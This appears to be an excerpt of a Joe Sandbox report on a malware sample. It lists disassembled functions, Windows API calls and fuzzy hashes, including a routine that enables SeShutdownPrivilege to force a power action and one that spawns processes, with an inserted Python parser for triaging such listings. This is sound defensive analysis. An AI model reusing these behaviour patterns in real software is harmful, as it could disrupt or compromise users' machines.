                                              • Opcode ID: a43f02aa5b1e73ba79cdeb9bcd896c89c36137f04f6643b3952a25b88a793122
                                              • Instruction ID: ca558282e4a9ec8e3eb9a7bf203776dcf3da3ad3c8c57216a2c0e9ea77321372
                                              • Opcode Fuzzy Hash: a43f02aa5b1e73ba79cdeb9bcd896c89c36137f04f6643b3952a25b88a793122
                                              • Instruction Fuzzy Hash: 0AA10432A1814D8FCF099F68C855BAD7BF1AB87728F18015AED11ABBD0DB35890AC751
                                              APIs
                                              • WriteFile.KERNEL32(?,?,00000038,?,00000000), ref: 6C1CB62F
                                              Strings
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID: *$,=ym$-=ym$-=ym$B$H
                                              • API String ID: 3934441357-3163594065
                                              • Opcode ID: 159a7d1c4120d72bbc33ae3d84a0f0c1bffc0e935829c5a29355e62d68df031b
                                              • Instruction ID: 0d1bed58c2fcc1b499681f05c3d7cfa2a76cd6e2f0bd927ace7c811a0d987a68
                                              • Opcode Fuzzy Hash: 159a7d1c4120d72bbc33ae3d84a0f0c1bffc0e935829c5a29355e62d68df031b
                                              • Instruction Fuzzy Hash: 04726B74609345DFCB14CF28C4A065ABBE1AFAA304F188E1EF499CBB51D778D8468B53
                                               Memory Dump Source: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true; associated dumps and IDA plugin snapshot file (hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd) identical to the first entry above
                                              Similarity
                                              • API ID:
                                              • String ID: ;T55
                                              • API String ID: 0-2572755013
                                              • Opcode ID: 1fff1d3ab96fc129e1fd9b4351f1099f7e479e226880d62367619004b54cab67
                                              • Instruction ID: e01668677911b4d2897c4f0b87d6ea14814b8159a60d21991820a558b87128b7
                                              • Opcode Fuzzy Hash: 1fff1d3ab96fc129e1fd9b4351f1099f7e479e226880d62367619004b54cab67
                                              • Instruction Fuzzy Hash: C303D431645B018FCB28CF28C8D0799B7E3AFD5328759CB6DC0A64BA95DB74B44ACB50

                                               Control-flow graph (rendered in the report; node list not reproduced): function 6c1f86e0. API calls in the graph: CreateProcessA in the entry block 6c1f86e0-6c1f8767; WaitForSingleObject and CloseHandle * 2 in block 6c1f87b0-6c1f87fa, which loops back to 6c1f878b.
                                               Memory Dump Source: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true; associated dumps and IDA plugin snapshot file (hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd) identical to the first entry above
                                              Similarity
                                              • API ID: CloseHandle$CreateObjectProcessSingleWait
                                              • String ID: D
                                              • API String ID: 2059082233-2746444292
                                              • Opcode ID: 2612a8d7ea87629b2d2f27c8d45d5111dcb7affe7b823977d1b9b1684fcd89a3
                                              • Instruction ID: edc60ade0452d7989bdeab494b0970828fb18ae195f10117c372437a87c3d51e
                                              • Opcode Fuzzy Hash: 2612a8d7ea87629b2d2f27c8d45d5111dcb7affe7b823977d1b9b1684fcd89a3
                                              • Instruction Fuzzy Hash: BC31E471819380CFE740DF29D18871ABBF0AB9A318F515A1EF8E9963A0D7789585CF43

                                               Control-flow graph (rendered in the report; node list not reproduced): function 6c20f34e. API calls in the graph: WriteFile in block 6c20f485-6c20f4a7, GetLastError in block 6c20f4a9-6c20f4af. Internal calls: 6c2030bc, 6c2030cf, 6c2030e2, 6c203810, 6c20e359, 6c20f530, 6c20f5a1, 6c20f94b, 6c20f9b3, 6c20fa8e, 6c20fb77.
                                              APIs
                                                • Part of subcall function 6C20F5A1: GetConsoleCP.KERNEL32(?,6C20E7C0,?), ref: 6C20F5E9
                                              • WriteFile.KERNEL32(?,?,6C217DDC,00000000,00000000,?,00000000,00000000,6C2191A6,00000000,00000000,?,00000000,6C20E7C0,6C217DDC,00000000), ref: 6C20F49F
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,6C217DDC,6C20E7C0,00000000,?,?,?,?,00000000,?), ref: 6C20F4A9
                                              • __dosmaperr.LIBCMT ref: 6C20F4EE
                                               Memory Dump Source: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true; associated dumps and IDA plugin snapshot file (hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd) identical to the first entry above
                                              Similarity
                                              • API ID: ConsoleErrorFileLastWrite__dosmaperr
                                              • String ID: 8Q
                                              • API String ID: 251514795-4022487301
                                              • Opcode ID: b00b80f2e870fb812cdcd2f64fde84614d532b76b6a511b39b33aba2ea824511
                                              • Instruction ID: 966e9be4f1c955125097b2b5297afc7d77f59fbc96961ba2440e5e0d2a130296
                                              • Opcode Fuzzy Hash: b00b80f2e870fb812cdcd2f64fde84614d532b76b6a511b39b33aba2ea824511
                                              • Instruction Fuzzy Hash: 7051B471B8120EABDB00DFA4C880FDFBBB9EF0A328F140557ED10A7A51D77499458769

                                               Control-flow graph (rendered in the report; node list not reproduced): function 6c1f9280. No direct API calls in the graph. Internal calls: 6c0c01f0 and 6c204208 (block 6c1f92af), then 6c0c2250, 6c0c2340, 6c1fca69, 6c0be010 and 6c1fa778 (block 6c1f937a-6c1f9439).
                                              APIs
                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C1F9421
                                               Memory Dump Source: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true; associated dumps and IDA plugin snapshot file (hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd) identical to the first entry above
                                              Similarity
                                              • API ID: Ios_base_dtorstd::ios_base::_
                                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                              • API String ID: 323602529-1866435925
                                              • Opcode ID: 6a79a65eb4f628d32f1796d7e8abc283c6f2c983fa50a7eb6769dc453ce1da94
                                              • Instruction ID: 63f49e1f346313e9a03d1dd33dc03293a9fef2d6844b61fb71f0c3ad21c58a31
                                              • Opcode Fuzzy Hash: 6a79a65eb4f628d32f1796d7e8abc283c6f2c983fa50a7eb6769dc453ce1da94
                                              • Instruction Fuzzy Hash: FC5134B5A00B008FD725CF29C495B97BBF1BB49318F008A2DD89647B90D779B90ACF90

                                               Control-flow graph (rendered in the report; node list not reproduced): function 6c1ccea0. API calls in the graph: WriteFile in blocks 6c1ccf05-6c1ccf21, 6c1cd091-6c1cd0aa and 6c1cd0af-6c1cd120; ReadFile in block 6c1ccfb8-6c1ccfee. Internal calls: 6c1fa260 (entry block), 6c1fea90, 6c1ff010.
                                              APIs
                                              • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C1CCFE1
                                               Memory Dump Source: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true; associated dumps and IDA plugin snapshot file (hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd) identical to the first entry above
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 97bf4e329c0c8c43ea41eeb930918009425eadbf6dfcb2abfe9e8756b659ac42
                                              • Instruction ID: 36a4db2c03b61e35d5234df1a53e3a4faebcfc09b9aa3f7c0cf25266c999c116
                                              • Opcode Fuzzy Hash: 97bf4e329c0c8c43ea41eeb930918009425eadbf6dfcb2abfe9e8756b659ac42
                                              • Instruction Fuzzy Hash: F3716CB0249344AFD710DF28C894B9ABBF4BF99708F50492EF494C7690D3B9D9958B83

                                               Control-flow graph (rendered in the report; node list not reproduced): function 6c1cc390, a tree of two-way branches starting at block 6c1cc426-6c1cc42f, to which most leaf blocks return. API calls in the graph: CreateFileA in block 6c1ccaa0-6c1ccb03. Internal calls: 6c1fa260 and 6c1ff010 (entry block), 6c1cb4d0, 6c1cce50, 6c1fea90, 6c1c2a20, 6c1c2a30.
                                               Memory Dump Source: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true; associated dumps and IDA plugin snapshot file (hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd) identical to the first entry above
                                              Similarity
                                              • API ID:
                                              • String ID: @*Z$@*Z
                                              • API String ID: 0-2842812045
                                              • Opcode ID: 9282f1aeff02567ec61d049d03453c0e172c7edae4c8417a04ab04c540f066d4
                                              • Instruction ID: 24b72f6807dbba375945e43e4fd79ee5975a5edc6cff6c41de2cc4dc828b0256
                                              • Opcode Fuzzy Hash: 9282f1aeff02567ec61d049d03453c0e172c7edae4c8417a04ab04c540f066d4
                                              • Instruction Fuzzy Hash: 244268706093428FCB14DF18C4A166EBBE1ABA9304F248D6EF49AC7762D238D945CB43

                                               Control-flow graph (rendered in the report; node list not reproduced): function 6c20f015. API calls in the graph: CloseHandle in block 6c20f063-6c20f073, GetLastError in block 6c20f075-6c20f07b. Internal calls: 6c214c92 (several sites), 6c214e0f, 6c2030e2.
                                              APIs
                                              • CloseHandle.KERNEL32(00000000,?,00000000,?,6C21794F), ref: 6C20F06B
                                              • GetLastError.KERNEL32(?,00000000,?,6C21794F), ref: 6C20F075
                                              • __dosmaperr.LIBCMT ref: 6C20F0A0
                                               Memory Dump Source: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true; associated dumps and IDA plugin snapshot file (hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd) identical to the first entry above
                                              Similarity
                                              • API ID: CloseErrorHandleLast__dosmaperr
                                              • String ID:
                                              • API String ID: 2583163307-0
                                              • Opcode ID: 4add9684d14346a507400a30eb2da594bef64e66e555d81f0fe60003a2fd5944
                                              • Instruction ID: 793d53f964530265ec399549b32344da76fa26af8167299b0ec6e8fe372674b5
                                              • Opcode Fuzzy Hash: 4add9684d14346a507400a30eb2da594bef64e66e555d81f0fe60003a2fd5944
                                              • Instruction Fuzzy Hash: 4801E53378932C16D71016399844BAB77AB4B8373DF29464AFE2887AC5DF6594448294

                                               Control-flow graph (rendered in the report; node list not reproduced): function 6c20428c. No direct API calls in the graph. Internal calls: 6c2030bc, 6c203810, 6c2043a9, 6c20be2e, 6c20d350, 6c20ef88, 6c207eab, 6c20e565.
                                               Memory Dump Source: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true; associated dumps and IDA plugin snapshot file (hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd) identical to the first entry above
                                              Similarity
                                              • API ID:
                                              • String ID: 8Q
                                              • API String ID: 0-4022487301
                                              • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                              • Instruction ID: 153481e7ddb09fea7feef5297b423a82570e505a6c932820b3eab59cd59fbd34
                                              • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                                              • Instruction Fuzzy Hash: 3DF0F932B0161C5AD72157299C00BCB33A89F5237DF204B17ED2093EC0DB30D40A86E1
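Each entry in this listing carries the same handful of machine-readable fields: API calls with their ref addresses, the API ID, String ID and API String ID, and the Opcode and Instruction fuzzy hashes. The Python below is an added example, not part of the Joe Sandbox report or its tooling. It parses entries in this shape into records and shows the two pivots a triager actually uses on them: finding every function that calls a given API combination (here the spawn-and-wait pattern CreateProcessA plus WaitForSingleObject from the function at 6c1f86e0, whose calls appear only in its control-flow graph) and grouping functions by the string-hash half of the API String ID. The sample text is constructed from four entries on this page, cut down to the lines the parser reads. The field-to-attribute mapping, the assumption that every entry ends with its Instruction Fuzzy Hash line, and the reading of the API String ID's second component as tracking the String ID (observed here: every entry with String ID 8Q carries 4022487301, and an empty String ID gives 0) are my assumptions, not documented behaviour of the plugin.

```python
import re
from collections import defaultdict, namedtuple
from dataclasses import dataclass, field

# Constructed sample: four entries from this listing, cut down to the lines the parser reads.
SAMPLE = """\
control_flow_graph 4469 6c1f86e0-6c1f8767 CreateProcessA 4470 6c1f878b-6c1f8794 4469->4470 4472 6c1f87b0-6c1f87fa WaitForSingleObject CloseHandle * 2 4470->4472
Similarity
• API ID: CloseHandle$CreateObjectProcessSingleWait
• String ID: D
• API String ID: 2059082233-2746444292
• Instruction Fuzzy Hash: BC31E471819380CFE740DF29D18871ABBF0AB9A318F515A1EF8E9963A0D7789585CF43
APIs
  • Part of subcall function 6C20F5A1: GetConsoleCP.KERNEL32(?,6C20E7C0,?), ref: 6C20F5E9
• WriteFile.KERNEL32(?,?,6C217DDC,00000000,00000000), ref: 6C20F49F
• __dosmaperr.LIBCMT ref: 6C20F4EE
Similarity
• API ID: ConsoleErrorFileLastWrite__dosmaperr
• String ID: 8Q
• API String ID: 251514795-4022487301
• Instruction Fuzzy Hash: 7051B471B8120EABDB00DFA4C880FDFBBB9EF0A328F140557ED10A7A51D77499458769
APIs
• ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 6C1CCFE1
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Instruction Fuzzy Hash: F3716CB0249344AFD710DF28C894B9ABBF4BF99708F50492EF494C7690D3B9D9958B83
Similarity
• API ID:
• String ID: 8Q
• API String ID: 0-4022487301
• Instruction Fuzzy Hash: 3DF0F932B0161C5AD72157299C00BCB33A89F5237DF204B17ED2093EC0DB30D40A86E1
"""

ApiCall = namedtuple("ApiCall", "name module ref subcall_of")  # subcall_of: "Part of subcall function" address
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
                    r"(?P<name>[^\s(]+?)\.(?P<module>\w+)(\(.*\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
CFG_ENTRY_RE = re.compile(r"^control_flow_graph \d+ ([0-9A-Fa-f]+)-")
CFG_API_RE = re.compile(r"\b[A-Z][A-Za-z0-9_]*\b")  # API names are the only CamelCase tokens in a graph line
SECTIONS = {"Control-flow Graph", "APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
FIELDS = {"API ID": "api_id", "String ID": "string_id", "API String ID": "api_string_id",
          "Instruction Fuzzy Hash": "instruction_fuzzy_hash"}

@dataclass
class FunctionEntry:
    entry_address: str = ""  # from the control_flow_graph line, when the entry has one
    apis: list = field(default_factory=list)  # ApiCall records; graph-only calls carry empty module/ref
    api_id: str = ""
    string_id: str = ""
    api_string_id: str = ""
    instruction_fuzzy_hash: str = ""

    def calls(self) -> set:
        return {c.name for c in self.apis}

def parse_entries(text: str) -> list:  # assumption: every entry ends with its Instruction Fuzzy Hash line
    entries, cur, section = [], FunctionEntry(), ""
    for raw in text.splitlines():
        line = raw.strip().lstrip("•-").strip()
        if line in SECTIONS:
            section = line
        elif line.startswith("control_flow_graph "):
            m = CFG_ENTRY_RE.match(line)
            cur.entry_address = m.group(1).upper() if m else ""
            cur.apis += [ApiCall(n, "", "", None) for n in sorted(set(CFG_API_RE.findall(line)))]
        elif section == "APIs":
            m = API_RE.match(line)
            if m:
                cur.apis.append(ApiCall(m["name"], m["module"], m["ref"].upper(), m["sub"]))
        else:  # Similarity / Memory Dump fields; legend residue such as "Executed" matches no field
            key, _, value = line.partition(":")
            if key.strip() in FIELDS:
                setattr(cur, FIELDS[key.strip()], value.strip())
            if key.strip() == "Instruction Fuzzy Hash":  # last field of every entry
                entries.append(cur)
                cur = FunctionEntry()
    return entries

def entries_calling(entries: list, required: set) -> list:
    return [e for e in entries if required <= e.calls()]  # API set = APIs list plus graph calls

def group_by_string_hash(entries: list) -> dict:
    """The second half of 'API String ID' tracks the String ID (on this page every entry with
    String ID 8Q carries 4022487301 and an empty String ID gives 0), so it groups functions by string set."""
    groups = defaultdict(list)
    for e in entries:
        h = e.api_string_id.partition("-")[2]
        if h and h != "0":
            groups[h].append(e)
    return dict(groups)

def triage(text: str) -> dict:
    """What a triager checks first: spawn-and-wait functions and functions that share a string set."""
    entries = parse_entries(text)
    spawners = entries_calling(entries, {"CreateProcessA", "WaitForSingleObject"})
    return {"spawn_and_wait": [e.entry_address for e in spawners],
            "shared_strings": {h: len(v) for h, v in group_by_string_hash(entries).items() if len(v) > 1}}
```

Pasting a full listing into parse_entries() gives one FunctionEntry per function; keying the result by instruction_fuzzy_hash lets you pivot the same function across reports of other samples, and feeding entries_calling() other combinations (CreateFileA with WriteFile, or CloseHandle with GetLastError and __dosmaperr) separates the CRT wrappers from the sample's own code.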
                                              APIs
                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C1F91A4
                                              • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6C1F91E4
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: Ios_base_dtorstd::ios_base::_
                                              • String ID:
                                              • API String ID: 323602529-0
                                              • Opcode ID: 62444e8e7acde9b737b11447f5215326673f86d67043c0abe7c58e6aae8a736b
                                              • Instruction ID: a587c1ea758197ce2b95bf960ebc360cf43a37953aa9c19bb5a1ec0a623fe31e
                                              • Opcode Fuzzy Hash: 62444e8e7acde9b737b11447f5215326673f86d67043c0abe7c58e6aae8a736b
                                              • Instruction Fuzzy Hash: 3B516871105B00DBD725DF24C894BE2BBF4BB05714F448A2CE9AA4BB91DB31B54ACB80
                                              APIs
                                              • GetLastError.KERNEL32(6C229DD0,0000000C), ref: 6C202642
                                              • ExitThread.KERNEL32 ref: 6C202649
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ErrorExitLastThread
                                              • String ID:
                                              • API String ID: 1611280651-0
                                              • Opcode ID: 8e20b128cfb61448f9e2dfcdb16bcd45372d6f91e169438080200e19acbaa225
                                              • Instruction ID: 93c204e329219219241cd2769f0a368ad3d16b34d622f4b921698a7e950d36ee
                                              • Opcode Fuzzy Hash: 8e20b128cfb61448f9e2dfcdb16bcd45372d6f91e169438080200e19acbaa225
                                              • Instruction Fuzzy Hash: 30F0A9B1B00209AFDB04AFB0C84DAAE3B74FF45715F24054AF801A7B91CF74A949CBA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: __wsopen_s
                                              • String ID:
                                              • API String ID: 3347428461-0
                                              • Opcode ID: 85c949191093f15451206047b180ffff3c823a17fa5bb05e340dcfc6160ce84c
                                              • Instruction ID: 5faec81a084a9524e430c476a3356d3a8e4fce1d1c47dfafcb04dd9f516e2c31
                                              • Opcode Fuzzy Hash: 85c949191093f15451206047b180ffff3c823a17fa5bb05e340dcfc6160ce84c
                                              • Instruction Fuzzy Hash: BD116671A0420EAFCB05CF58E944A9B3BF8EF48308F1040AAFC18AB311D630E911CBA4
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: _free
                                              • String ID:
                                              • API String ID: 269201875-0
                                              • Opcode ID: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                              • Instruction ID: f0d68df7c3b5b6d0ab86430dd6a3cc57fd2faa3adc893c043f8b9ac8c88ea99b
                                              • Opcode Fuzzy Hash: be7da6dea50fa55462c2689bd82912a63b2abf68e9cf5535eb42c5cf9c623313
                                              • Instruction Fuzzy Hash: 70012C72C0515EAFCF019FA8CC00AEE7FF5AB48214F144166BE24A2650E7318A25DB91
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,00000000,?,6C217805,?,?,00000000,?,6C217805,00000000,0000000C), ref: 6C217B64
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 6f148a325a47c42660629c569bab1a42eb204d8b6cc808f927812e9006e0e356
                                              • Instruction ID: 871693de62f6fa941db13ec03afae8d12d9ec667c2eccef3acc8b9af6c38af31
                                              • Opcode Fuzzy Hash: 6f148a325a47c42660629c569bab1a42eb204d8b6cc808f927812e9006e0e356
                                              • Instruction Fuzzy Hash: A3D06C3210014DBBDF028E84DC06EDA3BAAFB48B15F014000BE1856060C736E861EB90
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                              • Instruction ID: 23d296cedaa51b2efec75ab7818d5eb30da961f4dbc0db9e56b59ed71170133d
                                              • Opcode Fuzzy Hash: a80223a001130716628e74e8086c402ab21fb308a8a87af2905342d4276af0b1
                                              • Instruction Fuzzy Hash:
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: _strlen
                                              • String ID: C
                                              • API String ID: 4218353326-4157497815
                                              • Opcode ID: 6847bbd1003eb2ba78f0b18b07249e7b75e8ccec99418deb440c6f914314c02f
                                              • Instruction ID: 0d7b42880c6afe6a2bcb12669eaff136dc92f231cc505c8dc266e9cae92df579
                                              • Opcode Fuzzy Hash: 6847bbd1003eb2ba78f0b18b07249e7b75e8ccec99418deb440c6f914314c02f
                                              • Instruction Fuzzy Hash: 4D73F671644B018FC728CF29C8D0A95B7F2BF9531871A8B6DC0A787A55EB78B54BCB40
                                              APIs
                                              • GetCurrentProcess.KERNEL32 ref: 6C1F945A
                                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 6C1F9466
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 6C1F9474
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,00000000), ref: 6C1F949B
                                              • NtInitiatePowerAction.NTDLL ref: 6C1F94AF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ProcessToken$ActionAdjustCurrentInitiateLookupOpenPowerPrivilegePrivilegesValue
                                              • String ID: SeShutdownPrivilege
                                              • API String ID: 3256374457-3733053543
                                              • Opcode ID: d3e4677465f4b12ffe83129c0a66109f8b7da63a1aba5a3cd45e3e0a806d10d4
                                              • Instruction ID: eac771609923e2ff32cc0951f3b00ec5919d3cc05b93dfd76630977b37293628
                                              • Opcode Fuzzy Hash: d3e4677465f4b12ffe83129c0a66109f8b7da63a1aba5a3cd45e3e0a806d10d4
                                              • Instruction Fuzzy Hash: 15F05470684308BBEB00AF28DD0EB5A7BB8EF55B11F004518FD95AA1D1D7B06994CB92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
